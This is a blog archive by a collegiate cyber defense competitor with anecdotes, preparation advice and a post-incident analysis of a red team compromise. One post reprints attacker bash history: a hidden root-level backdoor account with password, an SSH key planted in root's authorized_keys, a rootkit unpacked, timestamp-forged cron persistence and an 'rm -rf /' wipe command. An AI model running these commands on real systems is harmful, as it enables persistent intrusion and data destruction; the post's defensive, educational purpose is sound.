Category Archives: Blog

Red Star, Schmed Star

 

In MACCDC 2015 Regionals the network started out with the VMs outlined in our team packets. Our team captain was away from our tables handling other administrative duties. An ‘inject’ came through which required us to use “Office Software” to create something, I can’t recall if it was a power point or ‘word’ document, to explain something that was going on with the network or systems. Along with the inject a new VM appeared in our vSphere console. It was a linux system labelled “Red Star”. We quickly launched it and realized this flavor of linux has a GUI vs just a console, but everything was in a different language, a language that our system administrators couldn’t read. We all left our seats and surrounded our teammate to see if it was something maybe we could read but, it wasn’t 😦 We tried carelessly clicking around trying to change the language to English but were failing at doing so.

Redstar3

Our team captain came back from her assignment and needed an update on what we were doing. We explained that we can’t read the language on the new system and were struggling to complete the new inject we received. She was standing over the shoulder of one of our system administrators and looked down at the new linux box. Her eyes focusing on the foreign letters on the screen she exclaimed excitedly “I can read this! Its Korean!”. It was a eureka moment for all of us. It was like when Lex Murphy realized it was a unix system. (https://www.youtube.com/watch?v=dFUlAQZB9Ng)

Our team captain is of Korean decent.

The linux system that was injected into the game was: https://en.wikipedia.org/wiki/Red_Star_OS

It’s not the hard things that trip you up, it’s the small stuff you waste time on.

 

 

A Face for Radio.

On Friday, I attended, as an observer, the 2016 MACCDC Regionals @ JHU-APL. Upon arrival I was asked to sign in. I was given a visitor’s badge, a pamphlet and a few other flyers. I put the lanyard from the badge over my head, threw the rest in my backpack and proceeded to the mezzanine. I mingled and chatted with old friends: blue teamers, red teamers, black teamers and some sponsors. I hung out for a couple hours and went home to begin my weekend.

Monday morning came around, I was getting my laptop out of my backpack and noticed the MACCDC pamphlet still in my pack. I took it out, put it on the desk. While waiting for my laptop to start, trying to escape the Monday morning fog I was sipping my coffee and openned the MACCDC pamphlet to the table of contents and started reading.

Something caught my eye to the left of the table of contents.

BAM!!!

My picture.

Inside Cover
Inside Cover

To see a full pdf of the Visitor Pamphlet MACCDC_2016_Pamphlet.

MACCDC: Qualifiers – How to prepare

The regional CCDC qualifying round for the Mid-Atlantic region is dubbed ‘Virtual Qualifiers’, because it is held on virtual servers in Amazon’s EC2 cloud infrastructure.

In order to properly prepare for such an even its best to know a little bit about it. The best source for information is from people who have participated in years past. The second best source is of-course, this site. Familiarize yourself with the historical data I have gathered from the past competitions.

Registration & Scoring:

Registration and scoring is done through threatspace: https://sb2.threatspace.net

Don’t let the day of competition be the first day you’ve looked at threatspace. Make yourself as familiar with it as you can, it will help you to feel comfortable and confident, and can shave time off from trying to figure out their site during the competition.

Scoring is done by something we call ‘scorebot’. It is the name we have given the scoring engine for the MACCDC region because it often uses the username ‘scorebot’ to log into systems. It is an automated system that checks for services that are up. ‘Scorebot’ reports this and displays it in pretty graphs and colors on threatspace’s website. You can change ‘scorebot’s password and I recommend doing so as it is often set to “chiapet1” and has been for years.  [A future post might discuss the necessity for open sourcing the scorebot]

How many systems and which:

Typically you are given 4 systems, 2 windows & 2 *nix. Again, check the resources I have provided, this will help you figure out which systems they like to bring back year after year.

Team Structure:

This has been gone over before in other posts from other sites and I’m sure each school or region will have their own twist on it but, make sure you have the best man/woman for the job. Some members on your team will be good at everything and some will have only a specialty or two. Make sure you put the best person on the keys that needs to be there. In qualifiers there is only 4 systems but there are 8 team members. Naturally we split up into teams of 2 for each system. One person on the keys and the other person as researcher. Unlike MACCDC regionals, you have full-blown internet access, there is no air-gap. The person in the ‘researcher’ role is there to look things up and provide support to the person on the keys. They should not be looking up things like “how to turn on your firewall” or “adding a user in AD” those are things you should already know how to do. Instead they would be most useful looking up how to administer or harden the web-app and back-end for the software that you’ve never seen before.

What to prepare for:

Don’t stand up 12 VMs and base your practice environment off of one of the topologies from the regional competition, until you get there.

Don’t spend your whole time practicing for regionals if you haven’t gotten past qualifiers. Remember you must get past qualifiers first. With that said, you will need to rehearse for regionals in-addition to qualifiers.

How to prepare:

Since qualifiers are held in Amazon’s EC2 cloud infrastructure, so should your practice environment for qualifiers. Go, sign up for the cloud service and stand up 4 VM’s. They have pre-made images for the systems that you will likely see. A couple hundred dollars worth of Amazon credits should get you enough for your team to get plenty of practice. If your school has a cyber security club maybe you can approach them about the possibility of funding such a thing. If not have each person put in $20. It’s not a huge investment and it will get you started.

Schedule:

The MACCDC qualifer is only 4 hours long. Time is of the essence. There is something like 32 schools in the MACCDC region. Generally qualifiers are held ~8 teams per day over 4 days. As a school you have the option of choosing which day you would like to compete on. You don’t always get the day you choose. Some theories range from:

  • Choosing day 1 means this will be a new environment to red team so they won’t be familiar with it, but this means if there is anything wrong with the infrastructure you will be the test dummies to figure it out.
  • Choosing a later day means the infrastructure should be fully tested but the red team will already know all the in’s and out’s of all the systems.
Things I’ve seen go wrong:
  • People getting locked out of their own boxes. (guilty)
  • Overly complex passwords don’t play nice. I’m not sure if it is threatspace’s website, or their database or input sanitization. Passwords with alot of symbols will cause ‘scorebot’ to incorrectly identify a service as being down. Instead choose a long alpha-numeric string.
A word of advice:
  • Do continuous pings to each of your scored systems so you’ll know when they go down. Don’t rely on ‘scorebot’.
  • Do nmap scans of your scored boxes, make sure the services you need up are up and responding. Check them from an outside computer. Do this constantly as things will change often in 4 hours.
  • You only have 4 hours: Keep It Simple Stupid!
  • Eat and go to the bathroom before competition starts. If allowed at your facility have a bottle of water with you.
Red Team activity:

2013: I didn’t participate in competition but friends did and did not remember any particular red team activity in the qualifiers.

2014: We didn’t see any red team activity, that is, we didn’t see any red team activity.

2015: There was a lot of red team activity. I have made blog posts about it, and so have others. Also, on one of our windows boxes they kept standing up a telnet server.

Feedback:

How do you prepare for the qualifiers? What are the qualifiers like in your region? Leave a comment below.

Summer Break: Stay busy

As I wrapped up my final exam and went to the Green Turtle with a classmate I was introduced to some people who were interested in playing CCDC in 2016. They knew I participated in the 2 previous years and wanted to know how they should be doing to prepare over the summer before join the CCDC club in the fall. I forget what I actually told them but after thinking about it, why didn’t I have a long list of items prepared to tell them? Hence this post.

Summer really is a great time to start preparing for the next years CCDC. Most people have off in the summer which normally means a little more free time. Think about what role you might want to play in CCDC then steer your training towards it. You should naturally gravitate to something that interests you. You will always put more into something if it interests you. Here are some ideas:

  • Firewall administration: Cisco ASA, pfSense, iptables
  • Windows Server Active Directory
  • Database: MSSQL, MySQL, postgres
  • Webserver administration: Apache, IIS, NGinx
  • Mailserver administration: owa, squirl mail
  • Forensics: memory analysis, pcaps, log analysis
  • Windows Sys-Admin: firewall, users, services
  • *nix sys-admin: iptables, pf, users, groups, services

Find something you like and dig-in. Summer break is time for you to really explore, because when school starts you won’t have the same freedom in your schedule.

Start or join a CTF team. People who are naturally good at team-based CTFs will often be good at CCDC, since they are similar.

CCDC takes alot of time. Practicing takes time. Setting up environments takes time. Just because CCDC limits you to 8 players doesn’t mean you can only have 8 people in your CCDC club. The more people to spread responsibility on the more time you’ll have.

Treat CCDC like a sports team. You have to show up for practice or you can’t play in the big game. Doing CTFs and CCDC rehearsals will weed-out who is willing to commit and who doesn’t have time for it. It will also help resolve personality conflicts sooner rather than later.

Test each-other:

Create VM’s on flash drives and trade them with each other. Seem if you can figure out what is mis-configured and what needs to be done to harden that system. This is also a good way to practice forensics. As you guys work on hacking each other’s VMs capture the traffic in pcaps and do memory dumps give those to the forensics person/s and see if they can identify what is going on without telling them. You can never have enough practice standing-up, configuring and securing a LAMP server. Make sure you know how to test and patch heartbleed and shellshock.

Challenge others to write small scripts to automate things. As you perform repetative task you’ll see where you can use scripts and where you can’t. Don’t try to automate everything, that plan will fail. Writing scripts will help you practice working at a command line, troubleshooting and regex. Start with log files:

tail -f /var/log/auth.log | grep Failed

Summer time is for learning. Fall is for practicing. Spring time is for performing.

In closing: find a group of friends you can get together with and have fun solving challenges together. You’ll find your groove, have fun.

Teams who win CCDC stay sharp all year.

How do you plan on staying sharp this summer? Do you have any advice for would be competitors? Leave a comment below.

Post CCDC Survey

The 2015 CCDC season is finally over. A new season looms over the horizon.

I have created a short survey (<10 minutes).

I tried to cover items that are not talked about in slides for debriefings or ‘how to prepare for ccdc’ guide. I also try to include questions so we can find out a little-bit about the competitors instead of the competition.

Past and present competitors please take a minute and checkout the survey: http://goo.gl/forms/TAuQS7pr5D

All responses are private. None of the question are required, all are optional

Meet the Red Team

I collected these from my crontab during MACCDC 2015 regionals, running phonehome_script -h [hacker_handle]

This list is not comprehensive. This list is not meant to frame or outline who-is the “enemy”, the Red Team in not the enemy.

Instead, it is a list of excellent hackers you should be following on twitter and read their blogs. Use this as a resource. These guys & gals will keep you up-to-date on the latest security trends, exploits, and politics. They might even drop a dime about CCDC once in a while.

You can also use this as a resource for incident reports by tying a person to a handle through social media profiles.

dlcowen: @HECFBlog – http://www.hecfblog.com & https://github.com/dlcowen
mubix: @mubix & http://www.room362.com
darkwolf:
jess@jessevarsalone
r00t0v3rr1d3: @r00t0v3rr1d3 – http://cevincere.com
gaz_:
m0r3sh311s: http://m0r3sh3lls.blogspot.com/ & https://github.com/m0r3Sh3LLs
cmcc:
rade:
jofo: @jofo
sapling:
veritas:
RustyB:
pasv:
skolor: @skolor
hal3001:
genxweb: @genxweb – http://www.digitaloffensive.com
Yeti:
phat32: @phat32http://www.social-engineer.org
recompiler: @recompilerhttp://death-merchant.blogspot.com
mechlovin:
wik:
cylus@cylussec & http://cylus.org/blog/
_cg_:
mstaint: @mstaint
Marqo09: @marqo09
mads:
rsmudge2015: @rsmudge & @amitagehacker
slicerfox:
warezjoe: @warezjoe

cat /etc/crontab
cat /etc/crontab

“o noes its melting”

“o noes its melting” was one of the last things I saw on my terminal in the final hour on the PBX box in MACCDC qualifiers.

I can’t recall exactly what showed up on my terminal but it was something like:

echo "o noes its melting" | wall && rm -rf /

Then all of my commands stopped working. Every single command stopped working, except for one, “history” and well, the rest is history…

 

1 who
2 ps -ef
3 /etc/init.d/httpd stop
4 ps -ef
5 nano /etc/new
6 nano /etc/crontab
7 nano /etc/new
8 /etc/init.d/crond restart
9 exit
10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld
12 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOLN4rECfgWn7MunohWjJtbFQf/V1f8tgAWNFONqJa8z5QkgA/xRRG2+v5TZHwHxquT89VO4EYh3Whv7ot3ffazQqbfgnMuAZuvDNjoxSc7qyCmtHshwpeP2zUsnr4Y+AH87OtsYsnlTOgQyGzh5QsDnDtwSHSkhtSnM58mtGBZqhnAARkeA4Cie3+djrhfGzJ+wRT/FtSdzW8OMauPMHf+3jVgXoHFk605G+47KPqfCFdXVoy9YPrjDVqccKuQ96RBDJcJt1OF0YpMJA9u0NnYglUEbwVXt4LXV7XAbIBocWAqKtA26zmlgO9lCyqOsq44XQ+/dmmSwtNEel3SnaF root@winnt" >> /root/.ssh/authorized_keys
13 ls
14 cd ll
15 cd ..
16 ls
17 cd ec2-user/
18 ls
19 ls
20 cd COPYING
21 ls
22 cat COPYING
23 cd .ssh
24 ls
25 cat authorized_keys
26 cd ..
27 ls
28 cd ..
29 ls -la
30 cd scorebot/
31 ls
32 cd .ssh
33 cd /root/.ssh
34 cd
35 cd /root
36 ls
37 cd /tmp
38 ls
39 cat vmcheck
40 cat dmitest
41 cat xingyiquan/
42 cd xingyiquan/
43 ls
44 less README
45 cd ..
46 ls
47 tar cvzf xingyiquan
48 tar cvzf xingyiquan.tgz xingyiquan/
49 ls
50 ls
51 rm xingyiquan*
52 rm -rf xingyiquan/
53 ls
54 tar xvzg 1rt.tgz
55 tar xvzf 1rt.tgz
56 ls
57 rm 1rt.tgz xingyiquan/
58 rm -rf xingyiquan/
59 ls
60 cd /rot
61 cd /root
62 ls
63 cd .ssh
64 ls
65 cd ..
66 ls
67 ps aux
68 last
69 w
70 nano /root/.mmd
71 chmod +x /root/.mmd
72 touch -r /root/.rnd /root/.mmd /etc/cron.d/cron-apt
73 echo "5 * * * * root /root/.mmd" >> /etc/cron.d/cron-apt
74 ld -lsh
75 ls -lah
76 df
77 df -h
78 iptables -I INPUT -p icmp -j ACCEPT
79 iptables -I OUTPUT -p icmp -j ACCEPt
80 iptables -I OUTPUT -p icmp -j ACCEPT
81 netstat -tupn
82 cd /etc/vsftpd/
83 ls
84 cat user_list
85 cat ftpusers
86 cat vsftpd
87 cat vsftpd.conf
88 nano vsftpd.conf
89 iptables -I INPUT 2 -p tcp --dport 21 =j ACCEPT
90 iptables -I INPUT 2 -p tcp --dport 21 -j ACCEPT
91 iptables -I INPUT 3 -p tcp --dport 20 -j ACCEPT
92 cat /etc/passwd
93 passwd scorebot
94 ps -aux | grep vsftp
95 service vsftpd start
96 ps -aux | grep vsftp
97 cat /etc/passwd
98 cat /etc/shadow
99 passwd admin
100 cat /etc/shadow
101 cat /etc/passwd | grep sql
102 passwd mysqld
103 passwd ec2-user
104 netstat -tupn
105 passwd scorebot
106 netstat -tupn
107 passwd-master
108 passwd-wwwadmin
109 asterisk -r
110 who
111 netstat -tupn
112 iptables -I INSERT -s 173.12.15.68 -j DROP
113 iptables -I INPUT -s 173.12.15.68 -j DROP
114 netstat
115 lastlog
116 who
117 ps -aux | grep ssh
118 ps -aux | grep sshd
119 ls
120 ]lls
121 cd
122 cd /bin/
123 ls
124 su admin
125 su
126 service vsftp start
127 envars
128 /usr/bin/bash
129 /bin/sh
130 /bin/bash
131 path
132 echo $path
133 echo $PATH
134 /usr/local/sbinls
135 /usr/local/sbin ls
136 /root/bin
137 ';sa,c

 

It’s been 1 month since qualifiers but as far as I remember the only line numbers that are mine are: 74 – 137. To be really clear 119 – 137 was grasping at straws, there wasn’t any output, there weren’t files, there weren’t any commands, and the box stopped scoring for the last 40 minutes.

The very last command which would have been #138 was ‘history’ which yielded all the wonderful output above.

Lets step through this 1 chunk at a time and dissect it from the attackers point of view.

1 who
2 ps -ef
3 /etc/init.d/httpd stop
4 ps -ef

#Seeing who is currently logged in the box and what processes are running. Stopping my httpd service and checking to make sure its stopped or if there’s anything else that needs to be killed

5 nano /etc/new
6 nano /etc/crontab
7 nano /etc/new
8 /etc/init.d/crond restart
9 exit

#Creating a new file ‘new’ (we won’t see whats in it because the input is going to nano not bash). Editing the crontab. Restarting the cron daemon to use the new edits to the cron table.

10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld
12 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOLN4rECfgWn7MunohWjJtbFQf/V1f8tgAWNFONqJa8z5QkgA/xRRG2+v5TZHwHxquT89VO4EYh3Whv7ot3ffazQqbfgnMuAZuvDNjoxSc7qyCmtHshwpeP2zUsnr4Y+AH87OtsYsnlTOgQyGzh5QsDnDtwSHSkhtSnM58mtGBZqhnAARkeA4Cie3+djrhfGzJ+wRT/FtSdzW8OMauPMHf+3jVgXoHFk605G+47KPqfCFdXVoy9YPrjDVqccKuQ96RBDJcJt1OF0YpMJA9u0NnYglUEbwVXt4LXV7XAbIBocWAqKtA26zmlgO9lCyqOsq44XQ+/dmmSwtNEel3SnaF root@winnt" >> /root/.ssh/authorized_keys

#Creating a new user ‘mysqld’ with the password ‘r3dt3am’ using a non-unique UserID=”0″ & GroupID=”0″ trying to blend in with other system accounts. Adding your public key to root’s authorized key’s file so if the blue team changes the password you can still login without password authentication. #PersistenceIsABitch


13
|
|
|
38

#Looking around the users directories and checking their authorized_keys files.

39 cat vmcheck
40 cat dmitest

#I actually don’t know what these files contain, obviously they tell if a system is a VM or not(right?) but I don’t know what’s in the files.


41 cat xingyiquan/
42 cd xingyiquan/
43 ls
44 less README
45 cd ..
46 ls
47 tar cvzf xingyiquan
48 tar cvzf xingyiquan.tgz xingyiquan/
49 ls
50 ls
51 rm xingyiquan*
52 rm -rf xingyiquan/
53 ls
54 tar xvzg 1rt.tgz
55 tar xvzf 1rt.tgz
56 ls
57 rm 1rt.tgz xingyiquan/
58 rm -rf xingyiquan/

#I first thought this was some random character/name generated file/script. On a whim I googled it and found out what it really is: Xingyiquan Linux 2.6.x / 3.x Rootkit. I have yet to figure out what 1rt.tgz is. Despite this being an actual Rootkit I don’t see it being executed or compiled, only unpacked and then eventually removed.


59
|
|
69

#changing and listing directories

70 nano /root/.mmd
71 chmod +x /root/.mmd
72 touch -r /root/.rnd /root/.mmd /etc/cron.d/cron-apt
73 echo "5 * * * * root /root/.mmd" >> /etc/cron.d/cron-apt

#Create the hidden file .mmd, fill it with bash script, make it executable, make its time stamp and the time stamp for /etc/cron.d/cron-apt the same as /root/.rnd so they don’t stand-out too much. Add a cron job to execute /root/.mmd every hour on the 5th minute. eg. 2:05, 3:05, 4:05


74
|
#through
|
118

#74 – 118 are my commands. There are 2 things to know here. This was in the last hour of qualifiers. Why am I changing passwords and adding iptables this late in the game? The PBX box was shutdown. We had to get a restart and when they restart your boxes it goes back to defaults. Yay!

At the 119 mark is when I saw: "echo "o noes its melting" | wall && rm -rf /" on my terminal and then it stopped responding to commands. As you can see in 119 – 137 I am trying a bunch of different commands and nothing is giving me any output. Some teammates also tried commands without any success. A simple ‘ls’ yielded no output. ‘cd /bin/’ nope, nothing.

A couple of questions are still unanswered:

How did the red team get in, in the first place?

What did they do with the rootkit if it wasn’t installed?

What was actually in the crontab? .mmd? 1rt.tgz?

After the qualifiers that night I spent sometime googleing and found I wasn’t the only person who had this happen to them:

o noes its melting
o noes its melting

I also started googleing: “xingyiquan” and found:

https://sw0rdm4n.wordpress.com/2014/11/03/xingyiquan-simple-linux-kernel-rootkit-for-kernel-3-x-and-kernel-2-6-x/

http://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html

https://mobile.twitter.com/Sw0rdm4n/status/530411559080583168

http://www.ringlayer.net/

So I started investigating the rootkit, I wanted to know more. I found the rootkit at one of the many links above. It has a pretty good README file in it which pretty much says it all. This rootkit is new, released in November 2014. It is very customizable from bind shell, to reverse shell. You can set passwords on it. netfilter hooks trigger the reverse shell on a configurable port. I encourage everyone to play around with this on a VM, Ubuntu or CentOS is fine. The only way you’ll know what to look for is to try it yourself.

Rootkithunter did not find it in my tests on a VM. Did you have different results?

What did you find on your malware hunting adventure? Please share and lets learn from each other.

Do any red teamers want to own up to this or fill-in the gaps?

What I learned from this:

I didn’t know you could add a user and set a password like that. I see how it works and why it works but I never thought of doing it that way.

10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld

I learned about Xingyiquan rootkit, how to install it and use it, which now shows me what to look for.

I also learned to check all users crontab more frequently.

I almost forgot the most obvious thing here in this article: clear your bash history. If you can read it so can someone else.

history -c

The “No Pictures” Policy

We, @ AACC always enforce a strict no pictures policy @ qualifiers, until its over. Then we enforce a no social media policy. Here’s why…

After qualifiers I went searching through social media and turned up a couple posts regarding MACCDC Qualifiers. This was one of those posts I found from a competing school:

This picture was taken before qualifiers began and was posted before they began. The caption read “Ready for this…”

Ready for this...
Ready for this…

The problem is what’s in the background:

Passwords on the whiteboard!!!!!

4URedSucksTeam
4URedSucksTeam

What other information can we see?

Listing Roles & Chain of Command, from Mubix's "How to Win CCDC" Presentation.
Listing Roles & Chain of Command, from Mubix’s “How to Win CCDC” Presentation.

WiFi networks @ your school:

WiFi Networks
WiFi Networks

We can almost read the Sticky Notes on the desktop:

Sticky Notes
Sticky Notes

After the competition, it becomes a little more revealing:

After
After

Lets zoom in on each piece: Enhance…. Enhance… Enhance…

A printed slide from Mubix's "How to win CCDC" presentation.
A printed slide from Mubix’s “How to Win CCDC” presentation.

Which tools are they using:

Another printed slide from Mubix's "How to win CCDC" presentation.
Another printed slide from Mubix’s “How to Win CCDC” presentation.

Looks like PBX to me:

root_at_10-10-10-110
root@ip-10-10-10-110:

MySQL service won’t stay started: (More on this in a future post.)

service mysql start
service mysql start

Crème de la Crème: Moar Passwords!!!!

Moar Passwords
Moar Passwords

This post is not meant to make fun of or point out any flaws in any one person. This post is to bring awareness to the rest of the BlueTeam community that seemingly harmless photos can sometimes be too revealing.

Personally, I don’t even like posting pictures after the competition just in-case I make it to regionals and maybe nationals I don’t want to accidentally reveal any information to prying eyes.

As a team you should discuss whether or not you want to have a Pictures/Posting Policy and what it should be.

What are the policies at your school? What should they be?

Let see if the red-team can guess which school this was based on the passwords?

Offerings to the gods – Gifts for Red Team

I have participated in 2 MACCDC’s 2014 & 2015. As far as I know we are the only team that does this.

We bring in a gift for the Red Team in the morning of day 2 before competition start. We generally have and associate from our school drop it off so we don’t violate the direct contact clause in the rule manual.

In 2013 it was assorted donuts, and a card sealed with a kiss of red lipstick.

In 2014 we sent flowers, pink balloons and again a card with a kiss of red lipstick… I think.

This year, 2015, we bought a pineapple, hollowed it out. Filled it with cheap pink & blue dollar shooter bottles, and added WiFi antennae for looks. Boom. WiFi pineapple. Happy hacking.

I got 99 Problems...
I got 99 Problems…
To Red Team
To Red Team
With Love
With Love
WiFi Pineapple
WiFi Pineapple

MACCDC 2015 – Badges

This year’s competition was called “Operation Transit Storm” and was based on public transportation. It was only fitting that our badges fit the same theme. Larry Pesce (@haxorthematrix) did the badges as he has done in years past.

Upon entering on Thursday we were each given a blue etched badge on a lanyard with a RFID card glue to the back of it, a RasberryPi B+, a 3 page manual(Derpypot 1.0 Instructions) and verbal instructions that “this is a honey pot to use it if you wish. The login name and operating instructions are in the packet but you’ll have to figure out the password to login.”

Our blue badges were completely etched with something base64 encoded. We were all instructed to move into the auditorium were we would be briefed on the following days schedule of events.

Blue Etched Badge
MACCDC2015 Blue Etched Badge

While waiting we took out our badges and plugged in the etching into a base64 decoder.

BASE64 Decode
BASE64 Decode

rootkitthenutwork.net??? was this a typo? We checked the DNS TXT records, for rootkitthenutwork.net and didn’t get anything. We tried rootkitthenetwork.net and got:

DNS TXT Record
DNS TXT Record

We tried navigating to both sites but neither had any pages published.

A quick googling using the half of the quote that was given to us yielded the other half quickly.

What do I care about law?
What do I care about law?

Later that night it was confirmed that one of the teams bought rootkithenutwork.net and stood up a page with false clues for solving the puzzle. I forget which school it was but I thought that buying the domain that morning was pretty good.

The next morning I approached Larry and asked did he intentionally throw us off with the typo “nutwork”. He said no and that who ever owns that domain was just having fun with us. The difference was in translating the encoding from the badge to the decoder. If you thought it was a “1” it came out ‘nutwork’ if you thought it was a lower case “L” it comes out ‘network’.

cm9vdGtpdHRoZW51dHdvcmsuY29tlGRucyB0eHQ=

cm9vdGtpdHRoZW5ldHdvcmsuY29tlGRucyB0eHQ=

On the Pi is Tom’s Honeypot.